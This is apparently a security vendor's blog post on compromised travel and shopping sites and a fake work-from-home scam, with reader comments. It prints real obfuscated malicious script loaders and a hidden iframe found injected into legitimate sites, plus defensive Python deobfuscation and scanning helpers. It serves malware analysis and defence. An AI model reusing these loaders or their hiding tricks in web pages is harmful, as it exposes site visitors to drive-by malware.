
Fancy a ‘Work-From-Home-Scam’ with that Holiday?

Prepared by Steve Espino – PC Tools Malware Research Team

With the holidays just around the corner, people the world over are looking for the best deals on holiday packages and gifts for their friends and family. What better place to look than on the Internet—in the comfort of one’s own home and on one’s own digital devices? After all, travel sites that help eager holiday-goers find that perfect holiday getaway abound.

Yet while there are a host of legitimate travel and shopping websites, there are also, unfortunately, plenty of fraudulent websites posing as credible ones. And the threats don’t stop there; users also need to be aware that even legit travel and shopping-related websites may be prone to attacks. Although these trustworthy sites may appear ‘normal’ at first glance, there is often malicious code lurking beneath that puts your privacy at risk.

What you see is what you get. Or is it?

These are samples of legitimate sites that have been compromised with malicious invisible iframes or obfuscated scripts.

And below are some examples of these malicious scripts:

Users on the lookout for printable cards for Halloween and Hanukkah may have an embedded obfuscated malicious script to go with the cards:

<script>eval(unescape('var%20uhiktcwksaxfs%3D%27ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B%2F%27%3B%20function%20cxifjpvhyfhch%28str%29%20%7B%20str%3Dstr.split%28%27%40%27%29.join%28%27CAg%27%29%3B%20str%3Dstr.split%28%27%21%27%29.join%28%27W5%27%29%3B%20str%3Dstr.split%28%27%2A%27%29.join%28%27CAgI%27%29%3B%20var%20bt%2C%20dt%20%3D%20%27%27%3B%20for%28i%3D0%3B%20i%3Cstr.length%3B%20i%20%2B%3D%204%29%20%7B%20bt%20%3D%20%28uhiktcwksaxfs.indexOf%28str.charAt%28i%29%29%20%26%200xff%29%20%3C%3C18%20%7C%20%28uhiktcwksaxfs.indexOf%28str.charAt%28i%20%2B1%29%29%20%26%200xff%29%20%3C%3C12%20%7C%20%28uhiktcwksaxfs.indexOf%28str.charAt%28i%20%2B2%29%29%20%26%200xff%29%20%3C%3C%206%20%7C%20uhiktcwksaxfs.indexOf%28str.charAt%28i%20%2B3%29%29%20%26%200xff%3B%20dt%20%2B%3D%20String.fromCharCode%28%28bt%20%26%200xff0000%29%20%3E%3E16%2C%20%28bt%20%26%200xff00%29%20%3E%3E8%2C%20bt%20%26%200xff%29%3B%20%7D%20if%28str.charCodeAt%28i%20-2%29%20%3D%3D%2061%29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-2%29%29%3B%20%7D%20else%20if%28str.charCodeAt%28i%20-1%29%20%3D%3D%2061%29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-1%29%29%3B%20%7D%20else%20%7Breturn%28dt%29%7D%3B%20%7D')); document.write(cxifjpvhyfhch('PHNjcmlwdCBsY!ndWFnZT1KYXZhU2NyaXB0IHNyYz0iaHR0cDovL25vLXRvLWJlLmNuL3BkZnMvbWFpbi5waHA/cj0rZXNjYXBlKGRvY3VtZ!0LnJlZmVycmVyKSsmbj14JnM9K2xvY2F0aW9uLmhyZWYrIj48L3NjcmlwdD4=')); </script>

Once the unescape()'d decoder runs and the substituted base64 string is decoded, the page ends up with this embedded script tag:

<script language=JavaScript src="hxxp://no-<blocked>.cn/pdfs/main.php?r=+escape(document.referrer)+&n=x&s=+location.href+"></script>

Here is an embedded obfuscated malicious script found in a website offering Yoga retreats in fantastic locations like Greece and India:

document.write('<script src='+'h@^t@!$t$(p$^:#/)$&/$)n#(e$)w@s!$3$@i@!)n$)s!#i!d$)e##)r!$$-@(#c)(@o^@@))m^$.!)n$e&x)t@!&a&!&g^!@.#!c$@o!!m(!&).!(w)^$)i$@$n($$)d(o^!!w^#s&!l@$i#^v!e)^&-!^^c^!o^m).$c$o(#b#&^(a()$^l)#t$@t@(^r#!@u)&!e)&b(&l$@&!)u$#e(!$.&!(r^#&(!u@(:!&8#(!0!(8&^0#/#b#(&l!o)&g(^(f$!a$.))c$($o(@m$/((#!b)l(o!!#@g@)^f&#a&.)@c^#o!m#!/@)#g$(&o(^o@$)g(l(&e#$$.!@c$o^m$/))!w^^e^a#^@!t&#^@h)$$(e&r$.(@#c!o!m^/^!h(&#s!#b$$c((.)&c!@$o).&##&u(#k&!^#&/$)$^'.replace(/#|)|(|!|@|^|$|&/ig, '')+' defer=defer></scr'+'ipt>');</

Once the junk characters are stripped by the replace() call, this decodes to:

<script src=hxxp://news<blocked>blue.ru:8080/blogf<blocked>.com/google.com/weather.com/hsbc.co.uk/ defer=defer></script>

This one is from a website selling wholesale designer merchandise:

<script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
</script>

The malicious script only executes when Windows users visit the site: the /*@cc_on @*/ and /*@if (@_win32) markers are JScript conditional compilation, which only Internet Explorer honours, so every other browser sees nothing but a comment.

Deobfuscation reveals the following embedded script, which is designed to look like normal website statistics scripts in order to evade detection:

<script type="text/javascript" src="http://9<blocked>4.229/stats/stats.js"></script>
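Each of the three hiding tricks shown above (substituted base64 behind an unescape()'d decoder, a URL padded with junk characters that a replace() strips at run time, and a string whose every character is shifted by one code point) can be undone statically, without ever executing the script. The helpers below are an added example written for this page, not PC Tools' code. The substitution table is the one visible in the first sample's decoder; the demo payload, the padded string and the hosts under the reserved .invalid domain are constructed for the example.

```python
"""Static deobfuscation helpers for the three script-hiding tricks above.

Added example (not PC Tools' code). Nothing here evaluates JavaScript; each
helper re-implements the decoding step in Python so an analyst can recover
the injected tag offline from saved page source.
"""
import base64
import re
import urllib.parse

# Trick 1: base64 with a few digraphs swapped for single punctuation marks.
# This is the table the decoder in the first sample applies before decoding;
# it is applied in this order, exactly as the decoder does.
B64_SUBS = [("@", "CAg"), ("!", "W5"), ("*", "CAgI")]


def decode_substituted_base64(payload: str, subs=B64_SUBS) -> str:
    """Undo the digraph substitutions, then plain base64-decode."""
    s = payload
    for short, long in subs:
        s = s.replace(short, long)
    s += "=" * (-len(s) % 4)  # restore padding if the sample dropped it
    return base64.b64decode(s).decode("latin-1")


def reveal_unescaped_source(blob: str) -> str:
    """eval(unescape('...')) hides the decoder itself; unescape() is just
    percent-decoding, so urllib recovers the source without running it."""
    return urllib.parse.unquote(blob)


# Trick 2: a readable URL with junk characters sprinkled in, removed by a
# .replace(regex, '') at run time. Removing the same character set suffices.
def strip_noise(padded: str, noise: str = "#)(!@^$&") -> str:
    return re.sub("[" + re.escape(noise) + "]", "", padded)


# Trick 3: every character shifted by one code point (charCodeAt(i) - 1).
def shift_chars(s: str, delta: int) -> str:
    return "".join(chr(ord(c) + delta) for c in s)


SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)


def defanged_sources(html: str) -> list:
    """Pull src= values out of a decoded tag and defang them for a report."""
    out = []
    for url in SRC_RE.findall(html):
        url = re.sub(r"^http", "hxxp", url, flags=re.I)
        out.append(url.replace(".", "[.]"))
    return out


def _obfuscate_for_demo(plain: str) -> str:
    """Build a trick-1 style payload from plaintext (constructed demo data only)."""
    s = base64.b64encode(plain.encode("latin-1")).decode("ascii").rstrip("=")
    for short, long in reversed(B64_SUBS):  # longest digraph first
        s = s.replace(long, short)
    return s


if __name__ == "__main__":
    # Constructed sample with a placeholder host (hypothetical, not from the page).
    demo = _obfuscate_for_demo('<script src="http://example.invalid/x.js"></script>')
    tag = decode_substituted_base64(demo)
    print(tag, defanged_sources(tag))
    print(reveal_unescaped_source("var%20x%3D1%3B"))
    print(strip_noise("h#t@t!p(:)/^/$e&x#a)m(p^l!e@.$i&n#v)a(l^i!d@/"))
    print(shift_chars("=tdsjqu?", -1))
```

The base64 helper is only exercised on the harmless opening of the first sample's payload and on constructed data; the point is that a decoder visible in the page source tells you exactly which substitutions to reverse, so there is never a reason to run the script to see what it loads.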

PC Tools also came across a travel website with pages that were injected all over with hidden, malicious iframes like this one:

<iframe width="1" height="1" src="hxxp://st<blocked>7.info/traff/index2.php" style="border: 0;"></iframe>

This hidden iframe loads a page from a malicious website, which lets the attackers deliver whatever payload they choose, ranging from Fake AVs and password stealers to ransomware and worms that turn computers into 'zombies' as part of a large bot network.
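For a site owner or responder checking saved page source, the injection patterns on this page are easy to triage mechanically: iframes sized 1x1 or styled invisible, and script blocks carrying the obfuscation markers seen above. The scanner below is an added example written for this page, not PC Tools' code; the HTML it scans is constructed for the demo and uses placeholder hosts under the reserved .invalid domain.

```python
"""Flag the injection patterns shown on this page in saved HTML.

Added example, not PC Tools' code. Intended as an offline triage aid: it
reports iframes that are sized or styled to be invisible, plus <script>
blocks that carry the obfuscation markers seen in the samples above.
"""
import re
from html.parser import HTMLParser

# Markers taken from the samples above: IE-only conditional compilation, an
# eval(unescape(...)) decoder stub, charCode arithmetic loops, and a
# document.write() that assembles a <script> tag from string pieces.
SCRIPT_MARKERS = {
    "cc_on": re.compile(r"@cc_on"),
    "eval_unescape": re.compile(r"eval\s*\(\s*unescape\s*\("),
    "charcode_loop": re.compile(r"String\.fromCharCode\s*\([^)]*charCodeAt"),
    "write_script": re.compile(r"document\.write\s*\([^;]*<scr", re.I),
}

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _tiny(value) -> bool:
    """True for width/height attributes of 1 pixel or less."""
    try:
        return int(str(value).strip("\"' ").rstrip("px")) <= 1
    except ValueError:
        return False


class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # (kind, evidence, reasons)
        self._in_script = False
        self._script_text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            reasons = []
            if _tiny(a.get("width")) and _tiny(a.get("height")):
                reasons.append("1x1")
            if HIDDEN_STYLE.search(a.get("style") or ""):
                reasons.append("hidden-style")
            if reasons:
                self.findings.append(("iframe", a.get("src", ""), reasons))
        elif tag == "script":
            self._in_script = True
            self._script_text = []

    def handle_data(self, data):
        if self._in_script:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_text)
            hits = [name for name, rx in SCRIPT_MARKERS.items() if rx.search(body)]
            if hits:
                self.findings.append(("script", body[:40], hits))


def scan_html(html: str) -> list:
    p = InjectionScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed page: one legitimate video embed, two hidden iframes, three
# scripts mimicking the samples above (placeholder hosts, shortened payloads),
# and one benign analytics script that must not be flagged.
SAMPLE_HTML = """<html><body>
<p>Holiday deals</p>
<iframe width="560" height="315" src="https://video.example.invalid/embed/1"></iframe>
<iframe width="1" height="1" src="hxxp://bad.example.invalid/index2.php" style="border: 0;"></iframe>
<iframe src="hxxp://bad.example.invalid/x" style="display:none"></iframe>
<script>/*@cc_on @*/
/*@if (@_win32)
var source="=tdsjqu?"; var result="";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/</script>
<script>eval(unescape('var%20x%3D1'));</script>
<script>document.write('<script src='+'h#t@t!p(:)/^/'.replace(/[#()!@^$&]/g, '')+' defer=defer></scr'+'ipt>');</script>
<script>console.log("site analytics")</script>
</body></html>"""

if __name__ == "__main__":
    for kind, evidence, reasons in scan_html(SAMPLE_HTML):
        print(kind, reasons, evidence)
```

The 1x1 check is the one that catches the iframe quoted above; the style check catches the display:none variant. Script-body markers are deliberately narrow so that ordinary analytics snippets do not trip them, which is why the benign script in the sample produces no finding.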

In another instance, unsuspecting users are offered the opportunity to start earning money from home immediately. The scam entices users to sign up quickly by falsely claiming that there are very few positions remaining.

When users try to leave the page, the site offers them a chat with an “Agent” to “secure your position.” Users may be tricked into thinking that the agent is authentic when, in fact, it is often an automated bot.

[Screenshots in the original post, captioned: "Using names of big media networks"; "Same propaganda hosted on different sites"; "(un) Lucky you!"; "Hand over the money, voluntarily"; "Chat with an 'Agent'"]

When users sign up, they are asked for their credit card details, which can lead to large fraudulent charges and even identity theft. For more information on identity theft, see the PC Tools Blog entry on the subject.

PC Tools advises against entering credit card information on any suspicious forms or sites. Victims of these attacks are strongly advised to contact their credit card companies immediately to dispute any anomalous transactions and to ensure that there will be no future unauthorized charges.

We wish everyone a virus-free and scam-free Holiday Season!


3 Responses to Fancy a ‘Work-From-Home-Scam’ with that Holiday?

  1. spg SCOTT says:

    Hi,

    This blog post is useful in explaining something elsewhere and I would like to use it, however there is an issue with the script you have posted.
    As it is posted in text form, it causes my antivirus to alert. Would it be possible to repost the code in an image, to prevent this from happening?

    I will post what I posted on the forum that it was reported:

    Because the code is posted directly (and by the looks of it in full) it also exists in the source code. This means that when the AV will scan the page, it will see that code and generate an alert.

    This is exactly the reason that I (and others here) recommend the posting of malicious code as images, as this problem will not arise.

    Thanks,

    Scott

  2. PC Tools says:

    Thanks for the heads up Scott!

    Which AV package are you using, out of curiosity?

  3. spg SCOTT says:

    Hi,

    My antivirus is avast!

    From looking at the code, it seems as though it is alerting on the code that contains "cc_o".
    While this is technically a false positive on the page, the detection is inherently correct, the code is malicious.
    It looks like you have commented out the characters, apparently this is not enough, as the code still exists in the page.

    Please can it be replaced with images?

    If you would like to continue this discussion by email, that is possible, as I think that it can be resolved quicker.

    The annoying thing is that the redirection, and the scam is useful to me to explain what happens with another code I have seen.
    (in that case the code loads an iframe to another site, which in turn causes a popup of the "news11" page you have shown.)

    Thanks,

    Scott
